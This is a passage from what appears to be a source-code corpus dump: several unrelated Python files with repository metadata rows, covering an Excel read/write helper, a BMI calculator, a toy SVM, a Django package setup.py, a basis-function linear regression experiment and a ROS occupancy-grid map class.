                self._logger.warn("query database exception,sql= %s,%s" % (sql, e))
        return flag
'''
常用’/‘来表示相对路径,’\‘来表示绝对路径,还有路径里\\是转义的意思(python3也可以写成open(r'D:\user\ccc.txt'),r表示转义)
'''
class operate_excel(object):
    """Create an excel workbook and support reading, writing and appending.

    Uses xlwt/xlrd/xlutils, so only legacy .xls files -- not .xlsx --
    can be modified.
    """
    def __init__(self, log=None, excel_file_name=None, sheet_name="sqldata"):
        self._logger = log
        self.excel_file_name = excel_file_name
        self.sheet_name = sheet_name
    def create_excel(self):
        # Create an empty file named excel_file_name in the current
        # working directory if it does not already exist.
        all_files = os.listdir(os.getcwd())  # every file in the project cwd
        if self.excel_file_name not in all_files:
            excel_file = open(self.excel_file_name, 'w+')
            excel_file.close()
            self.excel_file_name = excel_file.name
    def write_excel(self, data):
        """Write rows fetched from the database into the excel sheet.

        data -- either a single dict (one row: column name -> value) or a
        tuple of such dicts (many rows).  Column names go into row 0 and
        the values into the rows below.
        """
        i = 0
        key = []
        value = []
        key_2D = []
        value_2D = []
        workbook = xlwt.Workbook(encoding='utf-8')  # new workbook instance
        """
        xlwt.Workbook.__init__(self, encoding='ascii', style_compression=0):
        1. encoding is the output file's text encoding; 'utf-8' lets
           non-ASCII text (e.g. Chinese) be written to the sheet;
        2. style_compression controls style compression; the default is fine.
        """
        sheet = workbook.add_sheet(sheetname=self.sheet_name, cell_overwrite_ok=True)
        """
        Workbook.add_sheet(self, sheetname, cell_overwrite_ok=False):
        1. sheetname is the new sheet's name;
        2. cell_overwrite_ok (forwarded to the Worksheet) allows a cell to
           be written more than once; the default False forbids overwriting.
        """
        if data:
            if isinstance(data, dict):  # a single row
                for k, v in data.items():
                    key.append(k)
                    value.append(v)
                for k in range(len(key)):
                    sheet.write(i, k, key[k])
                    """
                    xlwt.Worksheet.write(self, r, c, label="", style=Style.default_style):
                    1. r: zero-based row index
                    2. c: zero-based column index
                    3. label: the value to write
                    4. style: an XFStyle object wrapping the cell's
                       formatting (easiest built via easyxf()).
                    """
                i += 1
                for k in range(len(value)):
                    sheet.write(i, k, value[k])
            if isinstance(data, tuple):  # multiple rows
                for data_row in data:
                    for k, v in data_row.items():
                        key.append(k)
                        value.append(v)
                    key_2D.append(key)
                    value_2D.append(value)
                    key = []
                    value = []
                # Header row: column names taken from the first record.
                for k in range(len(key_2D[0])):
                    sheet.write(i, k, key_2D[0][k])
                i += 1
                for row in range(len(value_2D)):
                    for col in range(len(value_2D[row])):
                        sheet.write(row + 1, col, value_2D[row][col])
        workbook.save('./%s' % self.excel_file_name)
        """
        Workbook.save(self, filename_or_stream):
        either a file name (the workbook is written to disk under that
        name, created if missing) or a stream object with a write method
        (e.g. StringIO), in which case the data is written to the stream.
        """
    def read_excel(self):
        # Read the first sheet and return its rows as a list of lists.
        content = []
        data = xlrd.open_workbook('./%s' % self.excel_file_name)
        table = data.sheets()[0]  # first sheet, selected by position
        # table = data.sheet_by_index(0)  # alternative: by index
        # table = data.sheet_by_name(self.sheet_name)  # alternative: by name
        """
        Row-wise access: table.nrows (row count) and table.row_values(i)
        (whole row returned as a list).
        """
        for i in range(table.nrows):
            content.append(table.row_values(i))
        """
        Column-wise access: table.ncols and table.col_values(i).
        """
        # for i in range(table.ncols):
        #     content.append(table.col_values(i))
        """
        Single-cell access: table.cell_value(i, j).
        """
        # for i in range(table.nrows):
        #     for j in range(table.ncols):
        #         content.append(table.cell_value(i, j))
        # B1 = table.row(0)[1].value  # cell access via row/column index
        return content
    def append_excel(self):
        # xlrd workbooks are read-only, so append via an xlutils copy.
        data = xlrd.open_workbook('./%s' % self.excel_file_name)
        buffer_data = xlutils.copy.copy(data)
        table = buffer_data.get_sheet(0)
        table.write(90, 0, 'append_test')
        buffer_data.save('./%s' % self.excel_file_name)
# Run the smoke test only when executed as a script.
if __name__ == '__main__':
    main()
"2199377508@qq.com"
] | 2199377508@qq.com |
0b1675281d2198123e759669b70a4f5c751a2d7f | 6cb5aee6af8351a5ca4b095a3e37eab2054c83bc | /Semana 5/ex5.py | 560e7b74a8ba83e5f40433846b6fb145fea86532 | [] | no_license | RafaelCsantos/AlgBionfo | 2e035f2f96f2c77780cde475d7bd8ce25d52056c | fd4b09d8edb409ae319864835904ed4ce94c2eba | refs/heads/main | 2023-04-23T19:42:48.372094 | 2021-04-29T03:15:49 | 2021-04-29T03:15:49 | 362,674,959 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,034 | py | dados={}
# Interactive registration loop: collects name, sex, weight and height for
# a series of people and reports averages at the end.  Prompts and output
# are Portuguese runtime strings and are kept exactly as written.
pessoas=[]
peso=0
imc=0
altura=0
imctotal=0
cont=0
alttotal=0
pesototal=0
while True:
    # NOTE(review): pessoas is cleared on every pass, so it only ever
    # holds the most recently registered person -- confirm intent.
    pessoas.clear()
    dados['nome']= str(input('Nome:'))
    # Re-prompt until the answer is M or F.
    # NOTE(review): an empty reply also passes the `in 'MF'` test.
    while True:
        dados['sexo']= str(input('Digite o Sexo M OU F:')).upper()
        if dados['sexo'] in 'MF':
            break
        print("Digite apenas M OU F")
    dados['peso']= float(input('Peso:'))
    peso=peso+dados['peso']
    pesototal=pesototal+peso
    dados['altura']= float(input('altura:'))
    altura=altura+dados['altura']
    alttotal=altura+alttotal
    cont=cont+1
    imc=round (peso/(altura**2),2)   # BMI = weight / height^2
    imctotal=round((imctotal+imc),2)
    # Reset the per-person accumulators for the next iteration.
    imc=0
    altura=0
    peso=0
    pessoas.append(dados.copy())
    resp=str(input("Deseja continuar? N-não / Outra tecla - sim")).upper()
    if resp==("N"):
        break
print("A quantidade de pessoas cadastradas foi de",cont)
print("O peso médio das pessoas é de",pesototal/cont)
print("A altura media das pessoas é de",alttotal/cont)
print("O IMC médio das pessoas foi de",imctotal/cont)
| [
"rafaelcssantos@hotmail.com"
] | rafaelcssantos@hotmail.com |
d279ed36d0bb5f3e739bcd41a7e7926ea816e47d | 9fa9ceac0db98e4a73c9bd7b7c93506fcd9d2261 | /my_SVM.py | f3ec16da1dbca8ad95314a144fe1869a4f0d6b89 | [] | no_license | cuihan1994/ML | 8363c69ac40d932381942b30953007a492294ead | 413b784a93a2ba698e762ad6a0481de1835f1f6b | refs/heads/master | 2020-04-12T15:26:25.046328 | 2018-12-20T13:09:00 | 2018-12-20T13:09:00 | 162,581,031 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,040 | py | import matplotlib.pyplot as plt
from matplotlib import style
import numpy as np
style.use('ggplot')
class Support_Vector_Machine:
    """Linear SVM trained by a brute-force search over (w, b).

    Candidate weight vectors are restricted to the form [a, a] with sign
    patterns applied, so this only handles 2-D feature vectors.
    """
    def __init__(self,visualiazation = True):
        # (Keeps the original parameter spelling "visualiazation".)
        self.visualization = visualiazation
        self.colors = {1:'r',-1:'b'}  # plot color per class label
        if self.visualization:
            self.fig = plt.figure()
            self.ax = self.fig.add_subplot(1,1,1)
    def fit(self,data):
        """Train on data = {class_label (+1/-1): array of 2-D feature rows}."""
        self.data = data
        #{ ||w||:[w,b]}  -- every (w, b) that satisfies all constraints
        opt_dict = {}
        # Sign patterns applied to |w| to generate candidate directions.
        transforms = [[1,1],
                      [-1,1],
                      [-1,-1],
                      [1,-1]]
        # Flatten every feature value to find the data's overall range.
        all_data = []
        for yi in self.data:
            for featureset in self.data[yi]:
                for features in featureset:
                    all_data.append(features)
        self.max_feature_value = max(all_data)
        self.min_feature_value = min(all_data)
        #print(all_data)
        all_data = None  # release the temporary list
        # Progressively finer search steps (10%, 1%, 0.1% of the max value).
        step_size = [self.max_feature_value * 0.1,
                     self.max_feature_value * 0.01,
                     self.max_feature_value * 0.001]
        b_range_multiple = 5  # b is searched over +/- 5x the max feature value
        b_multiple = 5        # b moves in coarser steps than w
        latest_optimum = self.max_feature_value*10
        for step in step_size:
            # Restart each pass from the best magnitude of the previous one.
            w = np.array([latest_optimum,latest_optimum])
            optimized = False
            while not optimized:
                for b in np.arange(-1*(self.max_feature_value*b_range_multiple),
                                   self.max_feature_value*b_range_multiple,
                                   step*b_multiple):
                    for transformation in transforms:
                        w_t = w * transformation
                        found_option = True
                        # Constraint check: yi * (w.xi + b) >= 1 for all samples.
                        for i in self.data:
                            for xi in self.data[i]:
                                yi=i
                                if not yi*(np.dot(w_t, xi) + b) >= 1:
                                    found_option = False
                        if found_option:
                            opt_dict[np.linalg.norm(w_t)] = [w_t,b]
                #print(opt_dict)
                if w[0] < 0 :
                    # Magnitude has swept past zero: this step size is done.
                    optimized = True
                    print ('Optimized a step')
                else:
                    w= w - step
                    #print(w)
            # Keep the feasible w with the smallest norm (widest margin).
            norms = sorted([n for n in opt_dict])
            print(norms)
            opt_choice = opt_dict[norms[0]]
            print(opt_choice)
            self.w = opt_choice[0]
            self.b = opt_choice[1]
            # Seed the next (finer) pass slightly above the current optimum.
            latest_optimum = opt_choice[0][0]+step*2
    def predict(self,features):
        # sign(w.x + b): +1 or -1 (0 exactly on the boundary).
        classification = np.sign(np.dot(np.array(features),self.w)+self.b)
        if classification != 0 and self.visualization:
            self.ax.scatter(features[0],features[1],s= 200,marker = '*', c = self.colors[classification])
        return classification
    def visualize(self):
        # Scatter the training data, then draw the two support-vector
        # boundaries (v = +/-1) and the decision boundary (v = 0).
        [[self.ax.scatter(x[0],x[1],s=100,color = self.colors[i]) for x in data_dict[i]] for i in data_dict]
        def hyperplane(x,w,b,v):
            # Solve w.[x, y] + b = v for y.
            return (-w[0]*x-b+v)/w[1]
        datarange = (self.min_feature_value*0.9,self.max_feature_value*1.1)
        hyp_x_min = datarange[0]
        hyp_x_max = datarange[1]
        psv_1 = hyperplane(hyp_x_min,self.w,self.b,1)
        psv_2 = hyperplane(hyp_x_max,self.w,self.b,1)
        self.ax.plot([hyp_x_min,hyp_x_max],[psv_1,psv_2])
        nsv_1 = hyperplane(hyp_x_min, self.w, self.b, -1)
        nsv_2 = hyperplane(hyp_x_max, self.w, self.b, -1)
        self.ax.plot([hyp_x_min, hyp_x_max], [nsv_1, nsv_2])
        db_1 = hyperplane(hyp_x_min, self.w, self.b, 0)
        db_2 = hyperplane(hyp_x_max, self.w, self.b, 0)
        self.ax.plot([hyp_x_min, hyp_x_max], [db_1, db_2])
        plt.show()
# Toy data set: two classes (-1 and +1) of 2-D points, then train and plot.
data_dict = {-1:np.array([[1,7],
                          [2,8],
                          [3,8]]),
             1:np.array([[5,1],
                         [6,-1],
                         [7,3]])}
svm = Support_Vector_Machine()
svm.fit(data = data_dict )
svm.visualize()
"1034084684@qq.com"
] | 1034084684@qq.com |
8f45532721df9ce375e512eac8e8b5d2f48bbfcc | fe2eef159f7e75b6a3b4ecbacab53a19df33b8eb | /setup.py | 3c3eff7248dd676186f2778a2b4149610c6dc6e0 | [
"MIT"
] | permissive | a1fred/django-model-render | 6b9572ff26ced93e6de0aa15ac97fef1217ebeba | 0912b2ec9d33bada8875a57f7af9eb18d24e1e84 | refs/heads/master | 2020-09-12T19:23:57.847976 | 2017-01-02T20:49:20 | 2017-01-02T20:49:20 | 32,887,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,077 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from setuptools import setup
# Runtime requirement shared between install_requires and tests_require.
requirements = [
    'django>=1.4',
]
# Package metadata for django-model-render.
setup(
    name='django-model-render',
    version='0.5',
    description='Django models extension that allows define default model templates',
    author='a1fred',
    author_email='demalf@gmail.com',
    license='MIT',
    url='https://github.com/a1fred/django-model-render',
    packages=['model_render'],
    test_suite="runtests",
    platforms=['any'],
    zip_safe=False,
    install_requires=requirements,
    tests_require=requirements,
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Environment :: Django',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: MacOS :: MacOS X',
        'Operating System :: Unix',
        'Operating System :: POSIX',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
    ],
)
| [
"demalf@gmail.com"
] | demalf@gmail.com |
b8258a084ce7c4e00f53da32dc4f0012424731e4 | 83447f1c06244a5d1f62a5147a0dc3855b0142f4 | /main.py | ca795d368bd1813e37774082aba5d37a94bdae7a | [] | no_license | bhedavivek/linearregression | eeffa5709fc6cceed4d9229a6c43d07adcf74980 | 04ad15c26ad4e1d910b6f2d330e37d5900795ef3 | refs/heads/master | 2021-01-09T05:23:34.168593 | 2016-11-19T08:05:20 | 2016-11-19T08:05:20 | 80,758,851 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,996 | py | #IMPORTS
import csv;
import numpy as np;
from numpy.linalg import inv;
from scipy.spatial import distance
import math;
import random;
import scipy.cluster.vq as vq;
class dataSet():
    """Container for the three data splits used in the experiments.

    Each split ('training', 'validation', 'testing') maps 'x_matrix' to a
    list of feature rows and 'target_vector' to the matching targets.
    """
    def __init__(self):
        # Give every split its own fresh dict and lists.
        for split in ('training', 'validation', 'testing'):
            setattr(self, split, {'x_matrix': [], 'target_vector': []})
#Partitioning Data Set into Training, Validation and Testing Sets
def partition(x_matrix,target_vector):
    """Split (x_matrix, target_vector) into ~80/10/10 train/val/test.

    Rows are first grouped by class label (targets must be 0, 1 or 2),
    each class is split proportionally, and each split is shuffled so
    every partition keeps roughly the original class balance.

    NOTE(review): `t = x_matrix[i]; t.append(...)` appends each target to
    the caller's row lists in place, mutating x_matrix -- confirm intent.
    """
    tem=dataSet()
    tem.training['x_matrix']=[]
    tem.training['target_vector']=[]
    tem.validation['x_matrix']=[]
    tem.validation['target_vector']=[]
    tem.testing['x_matrix']=[]
    tem.testing['target_vector']=[]
    temp=[[],[],[]]
    # Group rows by class label; the target is appended onto the row so it
    # survives the shuffle, and popped back off below.
    for i in range(0,len(x_matrix)):
        t=x_matrix[i]
        t.append(target_vector[i])
        temp[int(target_vector[i])].append(t)
    t_set=[[],[],[]]
    # Per-class proportional split (~80% / ~10% / ~10%; the 0.7999 and
    # 0.89989 cutoffs presumably avoid rounding edge cases -- verify).
    for i in range(0,3):
        m=len(temp[i])
        for j in range(0,m):
            if(j<0.7999*m):
                t_set[0].append(temp[i][j])
            elif(j<0.89989*m):
                t_set[1].append(temp[i][j])
            else:
                t_set[2].append(temp[i][j])
    # Shuffle each split, then separate the appended target back out.
    for i in range(0,3):
        random.shuffle(t_set[i])
        m=len(t_set[i])
        for j in range(0,m):
            if i==0:
                tem.training['target_vector'].append(t_set[i][j].pop())
                tem.training['x_matrix'].append(t_set[i][j])
            elif i==1:
                tem.validation['target_vector'].append(t_set[i][j].pop())
                tem.validation['x_matrix'].append(t_set[i][j])
            elif i==2:
                tem.testing['target_vector'].append(t_set[i][j].pop())
                tem.testing['x_matrix'].append(t_set[i][j])
    return tem
def getInverseVariance(x_matrix, mu_vector, n):
    """Return the inverse of a diagonal (co)variance matrix around mu_vector.

    The per-feature variance is the sum of squared deviations of each row
    of x_matrix from mu_vector, divided by n * len(x_matrix).  Variances
    that are exactly zero (constant features) are clamped to 1e-16 so the
    diagonal matrix stays invertible, matching the original behaviour.

    Improvement: the hand-rolled O(d^2) double loop that built the
    diagonal matrix element by element is replaced with np.where/np.diag.
    """
    var_array = np.zeros(len(x_matrix[0]))
    for x_vector in x_matrix:
        var_array = np.add(var_array, np.power(np.subtract(x_vector, mu_vector), 2))
    var_array = np.divide(var_array, n * len(x_matrix))
    # Clamp exact zeros so inv() does not hit a singular matrix.
    var_array = np.where(var_array == 0, 1e-16, var_array)
    return inv(np.diag(var_array))
def get_inv_var_matrix(x_matrix, mu_matrix, n):
    """Build one inverse diagonal covariance matrix per basis centre."""
    return [getInverseVariance(x_matrix, centre, n) for centre in mu_matrix]
def phi_x(x_vector, mu_matrix, inv_var_matrix_vector):
    """Evaluate the Gaussian basis functions for one input row.

    Returns [1, phi_1(x), ..., phi_M(x)] where
    phi_j(x) = exp(-0.5 * (x - mu_j) S_j^-1 (x - mu_j)^T); the leading 1
    is the bias basis function.
    """
    basis_values = [1]  # bias term
    for j in range(len(mu_matrix)):
        deviation = np.subtract(x_vector, mu_matrix[j])
        quad_form = np.dot(deviation,
                           np.dot(inv_var_matrix_vector[j], np.transpose(deviation)))
        basis_values.append(math.exp(-0.5 * quad_form))
    return basis_values
def phi(x_matrix, mu_matrix, inv_var_matrix):
    """Design matrix: one row of basis-function values per input row."""
    return [phi_x(row, mu_matrix, inv_var_matrix) for row in x_matrix]
def delta_w(eta, e_delta):
    """Gradient-descent weight step: delta_w = -eta * gradient."""
    scaled_gradient = np.dot(-eta, e_delta)
    return scaled_gradient
def delta_e(e_d, e_w, lamb):
    """Total error gradient: data term plus lamb-weighted regulariser term."""
    regularisation = np.dot(lamb, e_w)
    return np.add(e_d, regularisation)
def delta_e_d(target, weight_vector, phi_x_n):
    """Gradient of the squared-error data term for one sample:

    -(t_n - w . phi(x_n)) * phi(x_n)
    """
    prediction = np.dot(weight_vector, np.transpose(phi_x_n))
    residual = np.subtract(target, prediction)
    return np.dot(np.dot(residual, -1), phi_x_n)
def delta_e_w(weight_vector):
    """Gradient of the weight-decay term; for E_W = 0.5 * w.w it is w itself."""
    gradient = weight_vector
    return gradient
def find_w_star(phi_matrix, lamb, target_vector):
    """Closed-form ridge-regression solution:

    w* = (lamb * I + Phi^T Phi)^-1 Phi^T t
    """
    phi_t = np.transpose(phi_matrix)
    gram = np.dot(phi_t, phi_matrix)
    regularised = np.add(np.dot(lamb, np.identity(len(phi_t))), gram)
    return np.dot(inv(regularised), np.dot(phi_t, target_vector))
def closedFormTrain(x_matrix, target_vector, clusterNum, n, lamb):
    """Fit the radial-basis linear model with the closed-form solution.

    clusterNum - 1 basis centres come from k-means; the extra basis
    function is the constant bias term.  Returns
    [w_star, mu_matrix, sigma_matrix].

    Bug fix: the original ignored the *lamb* argument and always solved
    with a hard-coded regulariser of 0.1; the parameter is now honoured.
    """
    centres = vq.kmeans(np.array(x_matrix), clusterNum - 1)
    mu_matrix = centres[0]
    sigma_matrix = get_inv_var_matrix(x_matrix, mu_matrix, n)
    phi_matrix = phi(x_matrix, mu_matrix, sigma_matrix)
    w_star = find_w_star(phi_matrix, lamb=lamb, target_vector=target_vector)
    return [w_star, mu_matrix, sigma_matrix]
def stochasticTrain(x_matrix,target_vector,clusterNum,n,lamb,eta,threshold):
    """Mini-batch (size 10) gradient descent for the basis-function model.

    Returns [weights, mu_matrix, sigma_matrix], mirroring closedFormTrain.
    Basis centres come from k-means (clusterNum - 1 clusters plus a bias).

    NOTE(review): this is a single pass over the data; the convergence
    test only runs every 10th sample and compares the max component of
    the last step against threshold -- confirm this stopping rule.
    """
    w_temp=[]
    temp=[]  # accumulates per-sample gradients for the current mini-batch
    x=vq.kmeans(np.array(x_matrix),clusterNum-1)
    mu_matrix=x[0]
    sigma_matrix=get_inv_var_matrix(x_matrix, mu_matrix,n)
    # Random initial weights in [0, 1).
    for i in range(0,clusterNum):
        w_temp.append(random.random())
    prevMax=1  # NOTE(review): assigned but never read afterwards
    for i in range(0,len(x_matrix)):
        phi_vector=phi_x(x_matrix[i],mu_matrix,sigma_matrix)
        e_d=delta_e_d(target_vector[i],w_temp,phi_vector)
        d_e=delta_e(e_d,w_temp,lamb)
        temp.append(d_e)
        if(i%10==0):
            # Average the batch gradient and take one descent step.
            temp=np.mean(temp,axis=0)
            w_d=delta_w(eta,temp)
            max_w=w_d[0]
            w_temp=np.add(w_temp,w_d)
            temp=[]
            for each in w_d:
                if(max_w<each):
                    max_w=each
            # Stop once the largest step component drops below threshold.
            if(math.fabs(max_w)<threshold):
                break
    return [w_temp,mu_matrix,sigma_matrix]
def calcError(phi_vector, target, w_star, lamb):
    """Root of the regularised squared error for a single sample."""
    residual = target - np.dot(w_star, np.transpose(phi_vector))
    penalty = lamb * np.dot(w_star, np.transpose(w_star))
    return math.sqrt(residual ** 2 + penalty)
def validationError(x_matrix, target_vector, w_star, lamb, mu_matrix, sigma_matrix):
    """Root-mean-square prediction error of w_star over a data set.

    lamb is accepted for interface compatibility but does not enter the
    returned value: the original computed the L2 penalty into an unused
    local (`const`) and discarded it; that dead computation is removed.
    """
    err = 0
    for i in range(len(x_matrix)):
        prediction = np.dot(w_star, np.transpose(phi_x(x_matrix[i], mu_matrix, sigma_matrix)))
        err = err + (target_vector[i] - prediction) ** 2
    return math.sqrt(err / len(x_matrix))
def testError(x_matrix, target_vector, w_star, lamb, mu_matrix, sigma_matrix):
    """RMS prediction error on the test split.

    This was a line-for-line duplicate of validationError (including the
    same unused L2 penalty local), so it now delegates to it instead of
    keeping a second copy of the loop.  lamb is unused but kept for the
    existing call sites.
    """
    return validationError(x_matrix, target_vector, w_star, lamb, mu_matrix, sigma_matrix)
#Loading Data from Input CSV Files(Synthetic Dataset)
# Features come from input.csv (one row per sample), targets from output.csv.
# NOTE(review): mode 'rU' (universal newlines) is deprecated in Python 3;
# the csv docs recommend open(..., newline='') instead.
x_matrix=[]
target_vector=[]
with open('input.csv', 'rU') as csvfile:
    spamreader = csv.reader(csvfile)
    for row in spamreader:
        temp=[]
        for item in row:
            temp.append(float(item))
        x_matrix.append(temp)
with open('output.csv', 'rU') as csvfile:
    spamreader = csv.reader(csvfile)
    for row in spamreader:
        for item in row:
            target_vector.append(float(item))
synthetic_part = partition(x_matrix,target_vector)
#Loading Data from Input CSV Files(Learning to Rank Dataset)
# Same loading scheme for the LeToR data (Querylevelnorm_X / _t files).
x_matrix=[]
target_vector=[]
with open('Querylevelnorm_X.csv', 'rU') as csvfile:
    spamreader = csv.reader(csvfile)
    for row in spamreader:
        temp=[]
        for item in row:
            temp.append(float(item))
        x_matrix.append(temp)
with open('Querylevelnorm_t.csv', 'rU') as csvfile:
    spamreader = csv.reader(csvfile)
    for row in spamreader:
        for item in row:
            target_vector.append(float(item))
part = partition(x_matrix,target_vector)
#Real World Data Set
# Hyper-parameters for the LeToR experiments.
clusterNum=17
lamb=0
eta=0.1
threshold=0.001
print("-----------LeToR Dataset-----------")
# NOTE(review): a bare "print" is a no-op expression in Python 3 (it
# prints nothing); "print()" for a blank line was probably intended.
print
#Closed Form Solution
print("---CLOSED FORM SOLUTION----")
print('M : '+str(clusterNum))
print('Lambda : '+str(lamb))
# NOTE(review): lamb=0 is passed as a literal here even though lamb is
# already 0 -- and closedFormTrain ignores it internally; verify.
newTrainResult = closedFormTrain(part.training['x_matrix'],part.training['target_vector'], clusterNum=clusterNum,n=0.5,lamb=0)
newErr=validationError(part.training['x_matrix'],part.training['target_vector'],newTrainResult[0], lamb,newTrainResult[1], newTrainResult[2])
print('Training_Error : '+str(newErr))
newErr=validationError(part.validation['x_matrix'],part.validation['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Validation_Error : '+str(newErr))
newErr=testError(part.testing['x_matrix'],part.testing['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Testing_Error : '+str(newErr))
print
#Stocastic Gradient Descent
print("---SGD SOLUTION----")
print('M : '+str(clusterNum))
print('Lambda : '+str(lamb))
print('Eta : '+str(eta))
newTrainResult = stochasticTrain(part.training['x_matrix'],part.training['target_vector'], clusterNum=clusterNum,n=0.5,lamb=lamb, eta=eta, threshold=threshold)
newErr=validationError(part.training['x_matrix'],part.training['target_vector'],newTrainResult[0], lamb,newTrainResult[1], newTrainResult[2])
print('Training_Error : '+str(newErr))
newErr=validationError(part.validation['x_matrix'],part.validation['target_vector'],newTrainResult[0], lamb,newTrainResult[1], newTrainResult[2])
print('Validation_Error : '+str(newErr))
newErr=testError(part.testing['x_matrix'],part.testing['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Testing_Error : '+str(newErr))
print
#Synthetic Data Set
# Hyper-parameters for the synthetic-data experiments.
clusterNum=8
lamb=0.2
eta=1
threshold=0.0001
print("-----------Synthetic Dataset-----------")
print
#Closed Form Solution
print("---CLOSED FORM SOLUTION----")
print('M : '+str(clusterNum))
print('Lambda : '+str(lamb))
# NOTE(review): the header prints lamb=0.2 but the training call passes
# the literal lamb=0 -- confirm which value was meant.
newTrainResult = closedFormTrain(synthetic_part.training['x_matrix'],synthetic_part.training['target_vector'], clusterNum=clusterNum,n=0.5,lamb=0)
newErr=validationError(synthetic_part.training['x_matrix'],synthetic_part.training['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Training_Error : '+str(newErr))
newErr=validationError(synthetic_part.validation['x_matrix'],synthetic_part.validation['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Validation_Error : '+str(newErr))
newErr=testError(synthetic_part.testing['x_matrix'],synthetic_part.testing['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Testing_Error : '+str(newErr))
print
#Stocastic Gradient Descent
# SGD is run without regularisation on this data set.
lamb=0
print("---SGD SOLUTION----")
print('M : '+str(clusterNum))
print('Lambda : '+str(lamb))
print('Eta : '+str(eta))
newTrainResult = stochasticTrain(synthetic_part.training['x_matrix'],synthetic_part.training['target_vector'], clusterNum=clusterNum,n=0.5,lamb=lamb, eta=eta, threshold=threshold)
newErr=validationError(synthetic_part.training['x_matrix'],synthetic_part.training['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Training_Error : '+str(newErr))
newErr=validationError(synthetic_part.validation['x_matrix'],synthetic_part.validation['target_vector'],newTrainResult[0], lamb,newTrainResult[1], newTrainResult[2])
print('Validation_Error : '+str(newErr))
newErr=testError(synthetic_part.testing['x_matrix'],synthetic_part.testing['target_vector'],newTrainResult[0],lamb,newTrainResult[1], newTrainResult[2])
print('Testing_Error : '+str(newErr))
| [
"krypton@Viveks-MBP.fios-router.home"
] | krypton@Viveks-MBP.fios-router.home |
aa29fd60858618da98f9bfe475b87bbcae300e96 | 2a7fb0ec4f3be86ec24bb8754229eaec8fff7141 | /random_nav/map_utils.py | c0abbd918aec640969db4cc33325449195eb27ab | [] | no_license | JMU-ROBOTICS-VIVA/random_nav_summer_expt | af4c479d64f753488f496655e05d8385cd70cfac | a9cbb1e491e015cb8f81d46005bc0472bdd493c8 | refs/heads/master | 2022-11-22T01:24:38.943973 | 2020-07-27T17:03:15 | 2020-07-27T17:03:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,710 | py | #!/usr/bin/env python
"""
Map class that can generate and read OccupancyGrid messages.
Author: Nathan Sprague
Version: 2/14/19
"""
import numpy as np
import rclpy
from nav_msgs.msg import OccupancyGrid
from geometry_msgs.msg import Pose, Quaternion, Point
class Map(object):
    """ The Map class represents an occupancy grid.

    Map entries are stored as 8-bit integers.

    Public instance variables:

        width      -- Number of columns in the occupancy grid.
        height     -- Number of rows in the occupancy grid.
        resolution -- Width of each grid square in meters.
        origin_x   -- Position of the grid cell (0,0) in
        origin_y   -- in the map coordinate system.
        grid       -- numpy array with height rows and width columns.

    Note that x increases with increasing column number and y increases
    with increasing row number.
    """
    def __init__(self, *args, **kwargs):
        """ Construct an empty occupancy grid.

        Can be called -either- with a single OccupancyGrid message as
        the argument, or with any of the following provided as named
        arguments:

        keyword arguments:
            origin_x,
            origin_y   -- The position of grid cell (0,0) in the
                          map coordinate frame. (default -2.5, -2.5)
            resolution -- width and height of the grid cells
                          in meters. (default .1)
            width,
            height     -- The grid will have height rows and width
                          columns cells.  width is the size of
                          the x-dimension and height is the size
                          of the y-dimension. (default 50, 50)

        The default arguments put (0,0) in the center of the grid.
        """
        if len(args) == 1 and isinstance(args[0], OccupancyGrid):
            self._init_from_message(args[0])
        elif len(args) == 0:
            self._init_empty(kwargs)
        else:
            raise ValueError("Constructor only supports named arguments.")
    def _init_empty(self, kwargs):
        """ Set up an empty map using keyword arguments. """
        self.origin_x = kwargs.get('origin_x', -2.5)
        self.origin_y = kwargs.get('origin_y', -2.5)
        self.width = kwargs.get('width', 50)
        self.height = kwargs.get('height', 50)
        self.resolution = kwargs.get('resolution', .1)
        self._init_numpy_grid()
    def _init_from_message(self, map_message):
        """
        Set up a map as an in-memory version of an OccupancyGrid message
        """
        self.width = map_message.info.width
        self.height = map_message.info.height
        self.resolution = map_message.info.resolution
        self.origin_x = map_message.info.origin.position.x
        self.origin_y = map_message.info.origin.position.y
        self.grid = self._data_to_numpy(map_message.data)
    def _init_numpy_grid(self):
        """
        Initialize a default numpy array.
        """
        self.grid = np.zeros((self.height, self.width))
    def _numpy_to_data(self):
        """
        Convert the numpy array containing grid data to a python
        list suitable for use as the data field in an OccupancyGrid
        message.
        """
        return list(self.grid.reshape((self.grid.size,)))
    def _data_to_numpy(self, data):
        """
        Convert the integer data field in an OccupancyGrid message to
        a numpy array.
        """
        return np.array(data, dtype='int8').reshape(self.height, self.width)
    def to_message(self):
        """ Return a nav_msgs/OccupancyGrid representation of this map. """
        grid_msg = OccupancyGrid()
        # NOTE(review): rclpy.timer.Clock.now() and the positional
        # Pose(Point(...), Quaternion(...)) constructions below look like
        # ROS1-style calls; confirm against the rclpy / geometry_msgs
        # versions actually in use.
        grid_msg.header.stamp = rclpy.timer.Clock.now()
        grid_msg.header.frame_id = "map"
        grid_msg.info.resolution = self.resolution
        grid_msg.info.width = self.width
        grid_msg.info.height = self.height
        grid_msg.info.origin = Pose(Point(self.origin_x, self.origin_y, 0),
                                    Quaternion(0, 0, 0, 1))
        grid_msg.data = self._numpy_to_data()
        return grid_msg
    def cell_position(self, row, col):
        """
        Determine the x, y cooridantes of the center of a particular grid cell.
        """
        # NOTE(review): x is derived from row and y from col here, while
        # the class docstring says x varies with column -- confirm the
        # intended convention with callers.
        x = row * self.resolution + .5 * self.resolution + self.origin_x
        y = col * self.resolution + .5 * self.resolution + self.origin_y
        return x, y
    def cell_index(self, x, y):
        """
